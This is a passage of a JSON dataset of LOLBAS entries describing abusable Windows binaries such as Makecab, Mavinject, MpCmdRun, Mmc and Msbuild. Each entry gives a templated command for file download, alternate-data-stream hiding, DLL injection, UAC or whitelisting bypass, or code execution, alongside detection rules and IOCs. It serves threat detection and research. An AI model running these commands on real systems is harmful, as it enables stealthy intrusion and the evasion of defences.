Internet","mitre":["T1105"],"privilege":"admin","fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml"}],"references":["https://twitter.com/0gtweet/status/1564968845726580736","https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"]},{"id":"lolbas:makecab-exe:0","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:1","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:2","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compresses the target file and stores it in the target file.","usecase":"Download file and compress into a cab file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:3","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"makecab /F {PATH:.ddf}","description":"Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:mavinject-exe:0","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}","description":"Inject evil.dll into a process with PID 3110.","usecase":"Inject dll file into running process","mitre":["T1218.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"]},{"id":"lolbas:mavinject-exe:1","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll","description":"Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172","usecase":"Inject dll file into running process","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:0","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:1","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:2","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:mmc-exe:0","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Launch a 'backgrounded' MMC process and invoke a COM payload","usecase":"Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mmc-exe:1","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"mmc.exe gpedit.msc","description":"Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.","usecase":"Modify HKCU\\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.","mitre":["T1218.014"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mmc-exe:2","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Download and save an executable to disk","usecase":"Download file from Internet","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mofcomp-exe:0","toolId":"lolbas:mofcomp-exe","toolName":"Mofcomp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mofcomp.exe {PATH_ABSOLUTE:.mof}","description":"Abuse of mofcomp.exe to parse a file which contains MOF statements in order create new classes as part of the WMI repository","usecase":"Threat actors can use mofcomp.exe to register a malicious MOF file as a new class in the WMI repository","mitre":["T1047"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"strange parent processes spawning mofcomp.exe like cmd.exe or powershell.exe"},{"type":"Sigma","value":"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml"}],"references":["https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp","https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-","https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/","https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/","https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96","https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"]},{"id":"lolbas:mpcmdrun-exe:0","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}","description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:mpcmdrun-exe:1","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"copy \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\" C:\\Users\\Public\\Downloads\\MP.exe && chdir \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\\" && \"C:\\Users\\Public\\Downloads\\MP.exe\" -DownloadFile -url {REMOTEURL:.exe} -path C:\\Users\\Public\\Downloads\\evil.exe","description":"Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:mpcmdrun-exe:2","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe","description":"Download file to machine and store it in Alternate Data Stream","usecase":"Hide downloaded data into an Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"]},{"id":"lolbas:msbuild-exe:0","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msbuild.exe {PATH:.xml}","description":"Build and execute a C# project stored in the target XML file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files 